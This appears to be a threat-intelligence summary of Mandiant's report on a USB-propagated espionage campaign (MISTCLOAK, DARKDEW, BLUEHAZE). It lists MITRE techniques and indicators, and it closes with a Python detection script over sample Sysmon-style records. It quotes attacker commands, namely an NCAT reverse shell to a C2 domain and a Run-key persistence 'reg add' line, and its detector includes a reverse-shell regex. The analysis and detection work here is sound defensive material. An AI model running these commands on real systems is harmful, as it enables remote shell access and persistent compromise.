Key Points
- Initial infection vector is removable USB devices; users execute renamed signed apps from the drive root to trigger payloads.
- Threat actor side-loads malicious DLLs using legitimate signed binaries (USB Network Gate, Razer Chromium Render Process) to launch MISTCLOAK, DARKDEW, and BLUEHAZE.
- DARKDEW copies files from removable media to C:\ProgramData\udisk, creates persistence (HKCU Run key "udisk"), and continuously scans to infect additional removable drives.
- BLUEHAZE uses a renamed Razer binary to load RzLog4CPP.dll, deploy a staging folder C:\Users\Public\Libraries\CNNUDTV, create an HKCU Run entry "ACNTV", and execute a renamed NCAT (wuwebv.exe) to attempt a reverse shell to closed.theworkpc[.]com:80.
- The campaign's malware propagates via infected removable drives (worming capability), enabling potential exfiltration from air-gapped systems.
- Mandiant developed YARA rules and Managed Defense detections (process paths, registry Run modifications, NCAT/NETCAT usage) to identify and hunt similar activity.
MITRE Techniques
- [T1091] Replication Through Removable Media - UNC4191 activity begins when "a user plugs in a compromised removable device and manually executes a renamed signed binary from the root directory of the storage volume".
- [T1574.002] DLL Side-Loading - The campaign side-loads malicious DLLs: "The renamed USB Network Gate binaries load a MISTCLOAK DLL named u2ec.dll from the execution directory on the removable device (T1574.002)", and the renamed Razer binary "loads the legitimate file rzlog4cpp_logger.dll, which calls the getRoot function from the BLUEHAZE malware RzLog4CPP.dll during C runtime startup".
- [T1074.001] Local Data Staging / Copy to Removable Media - DARKDEW "copies every file from <drive>:\autorun.inf\Protection for Autorun\System Volume Information to C:\ProgramData\udisk" and later copies files back onto removable media for propagation.
- [T1547.001] Registry Run Keys / Startup Folder - Persistence is established via HKCU Run keys: value "udisk" executing c:\programdata\udisk\disk_watch.exe ("Key: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Value: udisk Text: c:\programdata\udisk\disk_watch.exe") and value "ACNTV" executing DateCheck.exe (reg add ... /v ACNTV ... "Rundll32.exe SHELL32.DLL,ShellExec_RunDLL "C:\Users\Public\Libraries\CNNUDTV\DateCheck.exe"").
- [T1059] Command and Scripting Interpreter - BLUEHAZE runs the NCAT reverse shell through cmd: "cmd.exe /C wuwebv.exe -t -e c:\windows\system32\cmd.exe closed.theworkpc[.]com 80".
- [T1482] Domain Trust Discovery - Mandiant observed "threat actors enumerating domain trusts (T1482) and querying domain and local group permissions (T1069.001, T1069.002) within a several minute span".
- [T1069.001] Permission Groups Discovery: Local Groups - Used to query local group permissions, as observed in hunting telemetry ("querying domain and local group permissions (T1069.001, T1069.002)").
- [T1069.002] Permission Groups Discovery: Domain Groups - Used to query domain group permissions, as observed in the same hunting telemetry.
- [T1136.001] Create Local Account - Appears in the technique-sequencing example used by hunters: "creation of a local account (T1136.001) and then addition to the local Administrators group (T1098)".
- [T1098] Account Manipulation - The same hunting example sequence includes adding the newly created account to the local Administrators group.
- [T1059.003] Windows Command Shell - One of the hunting missions that surfaced the campaign: "Mandiant identified this UNC4191 campaign by searching for anomalous sequences of events under our 'Mandiant Intelligence: Staging Directories' and 'Command and Scripting Interpreter: Windows Command Shell (T1059.003)' hunting missions".
- [T1036] Masquerading - Files and binaries are renamed so the on-disk name differs from the original file metadata (OriginalFileName: UsbConfig.exe; File Name: Removable Disk.exe, USB Drive.exe) in order to pass as legitimate applications.
- [T1060] Registry Run Keys / Startup - Detection mapping flagged "Registry Run key persistence for binary in PROGRAMDATA" ("Registry Key: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Value: udisk Text: c:\programdata\udisk\disk_watch.exe").
- [T1218.011] Signed Binary Proxy Execution: Rundll32 - BLUEHAZE persists the staged DateCheck.exe through a Rundll32 invocation stored in the Run key: "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ACNTV /t REG_SZ /d "Rundll32.exe SHELL32.DLL,ShellExec_RunDLL "C:\Users\Public\Libraries\CNNUDTV\DateCheck.exe"" /f".
Indicators of Compromise
- [Domain] NCAT C2: closed.theworkpc[.]com
- [MD5] MISTCLOAK sample and usb.ini: 7753da1d7466f251b60673841a97ac5a (MISTCLOAK), c10abb9f88f485d38e25bc5a0e757d1e (usb.ini), and 3 more hashes
- [MD5] DARKDEW payloads: 6900cf5937287a7ae87d90a4b4b4dec5 (DARKDEW decrypted payload)
- [MD5] BLUEHAZE and NCAT: f632e4b9d663d69edaa8224a43b59033 (BLUEHAZE), 8ec339a89ec786b2aea556bedee679c7 (NCAT)
- [MD5] Legitimate signed binaries used for side-loading: f45726a9508376fdd335004fca65392a, 707de51327f6cae5679dee8e4e2202ba (USB Network Gate), ea7f5b7fdb1e637e4e73f6bf43dcf090 (Razer Chromium Render Process)
- [File Path] Staging and persistence locations: C:\ProgramData\udisk (file and malware staging), C:\Users\Public\Libraries\CNNUDTV (BLUEHAZE staging)
The intrusion chain starts when a user executes a renamed, signed application from the root of a removable drive (e.g., "Removable Drive.exe" or "USB Drive.exe"), which side-loads a MISTCLOAK DLL (u2ec.dll) from the drive and launches an encrypted payload (usb.ini). MISTCLOAK acts as a launcher that decrypts and executes the chained payload stored on disk; the codebase references a PDB path containing Chinese characters that translate to "Disk Hijacking", indicating the development context.
The decrypted payloads implement a three-phase workflow. DARKDEW (dropper) copies files from the removable media into C:\ProgramData\udisk, drops renamed legitimate binaries (disk_watch.exe, DateCheck.exe), registers persistence under HKCU\Software\Microsoft\Windows\CurrentVersion\Run (value "udisk"), and, when running as disk_watch.exe, polls volumes A: through Z: to locate removable drives and copy a hidden autorun.inf\Protection for Autorun folder structure onto them to propagate. BLUEHAZE is side-loaded via a renamed Razer binary (DateCheck.exe) that loads RzLog4CPP.dll (which contains the BLUEHAZE code), creates C:\Users\Public\Libraries\CNNUDTV, persists with an "ACNTV" Run key, and executes a renamed NCAT (wuwebv.exe) to attempt a reverse shell.
The observed NCAT command line performs a reverse shell to closed.theworkpc[.]com:80 using "wuwebv.exe -t -e c:\windows\system32\cmd.exe closed.theworkpc[.]com 80". The overall behavior combines DLL side-loading, registry Run-key persistence, periodic scanning for removable media, file staging in ProgramData and Public Libraries, and propagation via infected USB devices, which together enable compromise of additional hosts and potential data transfer from air-gapped systems.
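As an added example (not code from the Mandiant report), the following Python check applies the detection ideas above to constructed Sysmon-style records: Run-key values whose target lives under ProgramData or Users\Public\Libraries, an ncat-style "-e <program> <host> <port>" command line, and a process whose PE OriginalFileName differs from its on-disk name while sitting at a volume root or in a staging directory. The record layout, field names and sample values are assumptions made for the demonstration.

```python
import ntpath
import re
from typing import Dict, List, Tuple

# Constructed Sysmon-style records for demonstration; these are not logs from the report.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"type": "registry", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
     "value": "udisk", "data": r"c:\programdata\udisk\disk_watch.exe"},
    {"type": "registry", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
     "value": "ACNTV", "data": r'Rundll32.exe SHELL32.DLL,ShellExec_RunDLL "C:\Users\Public\Libraries\CNNUDTV\DateCheck.exe"'},
    {"type": "registry", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
     "value": "OneDrive", "data": r"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe"},
    {"type": "process", "image": r"C:\Users\Public\Libraries\CNNUDTV\wuwebv.exe", "original_name": "ncat.exe",
     "cmdline": r"cmd.exe /C wuwebv.exe -t -e c:\windows\system32\cmd.exe closed.theworkpc[.]com 80"},
    {"type": "process", "image": r"E:\Removable Disk.exe", "original_name": "UsbConfig.exe",
     "cmdline": r'"E:\Removable Disk.exe"'},
    {"type": "process", "image": r"C:\Windows\System32\notepad.exe", "original_name": "NOTEPAD.EXE",
     "cmdline": "notepad.exe"},
]

STAGING_DIRS = ("c:\\programdata\\", "c:\\users\\public\\libraries\\")  # staging paths from the report
RUN_KEY_SUFFIX = "\\currentversion\\run"
# ncat/nc "-e <program> <host> <port>": hands the program's stdio to a remote socket.
NCAT_EXEC = re.compile(r"(?:^|\s)-e\s+(\S+)\s+(\S+)\s+(\d{1,5})(?:\s|$)", re.IGNORECASE)
VOLUME_ROOT = re.compile(r"^[a-z]:\\[^\\]+$", re.IGNORECASE)  # file directly under a drive root


def in_staging_dir(path: str) -> bool:
    low = path.lower()
    return any(d in low for d in STAGING_DIRS)


def check_event(ev: Dict[str, str]) -> List[Tuple[str, str]]:
    hits: List[Tuple[str, str]] = []  # (rule, detail) pairs for one record
    if ev["type"] == "registry":
        # Run-key persistence whose target lives in a world-writable staging directory.
        if ev["key"].lower().endswith(RUN_KEY_SUFFIX) and in_staging_dir(ev["data"]):
            hits.append(("run_key_in_staging_dir", f'{ev["value"]} -> {ev["data"]}'))
    elif ev["type"] == "process":
        m = NCAT_EXEC.search(ev["cmdline"])
        if m:  # program given to -e, plus the remote host:port it connects to
            hits.append(("ncat_reverse_shell", f"{m.group(1)} -> {m.group(2)}:{m.group(3)}"))
        # PE OriginalFileName disagrees with the on-disk name, and the file sits where the
        # campaign placed its renamed binaries: a volume root or a staging directory.
        renamed = ntpath.basename(ev["image"]).lower() != ev["original_name"].lower()
        if renamed and (VOLUME_ROOT.match(ev["image"]) or in_staging_dir(ev["image"])):
            hits.append(("renamed_signed_binary", f'{ev["image"]} (OriginalFileName={ev["original_name"]})'))
    return hits


def scan(events: List[Dict[str, str]]) -> List[Tuple[str, str]]:
    return [hit for ev in events for hit in check_event(ev)]
```

Running scan(SAMPLE_EVENTS) flags the udisk and ACNTV Run values, the wuwebv.exe reverse shell (twice: once for the -e syntax, once as a renamed ncat.exe in the staging folder) and the renamed binary at the removable drive root, while the OneDrive and notepad records pass.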
Read more: https://www.mandiant.com/resources/blog/china-nexus-espionage-southeast-asia